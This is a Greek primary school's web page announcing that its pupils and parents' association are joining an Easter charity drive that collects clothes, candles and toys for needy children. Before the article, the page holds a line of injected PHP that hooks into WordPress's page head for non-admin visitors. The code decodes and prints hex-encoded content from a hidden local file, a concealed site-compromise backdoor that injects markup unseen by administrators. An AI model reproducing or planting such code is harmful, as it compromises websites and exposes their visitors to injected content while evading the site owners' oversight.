if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Το Δημοτικό συμμετέχει στην δράση “Αυτό το Πάσχα γίνε και εσύ Νονός” |

Το Δημοτικό συμμετέχει στην δράση “Αυτό το Πάσχα γίνε και εσύ Νονός”

Το Δημοτικό Σχολείο Λεωνιδίου και ο Σύλλογος Γονέων και Κηδεμόνων του Δημοτικού Σχολείου με μεγάλη χαρά, συμμετέχουν στην δράση του ΣΚΑΙ και της ΕΘΝΙΚΗΣ Τράπεζας, «Αυτό το Πάσχα γίνε και εσύ Νονός».

Σκοπός της δράσης είναι να συγκεντρώσουμε ρούχα, παπούτσια, λαμπάδες και παιχνίδια, για τα παιδιά άπορων οικογενειών Δήμων, αλλά και τα παιδιά της ένωσης «Μαζί για το παιδί»

Τα παιδιά του Δημοτικού κατασκεύασαν και προσφέρουν στην Δράση αυτή χειροποίητες λαμπάδες από φυσικό κερί και μικρά αερόστατα και καλούν όλους μας και αυτό το Πάσχα, ας γίνουμε νονοί για χιλιάδες παιδιά!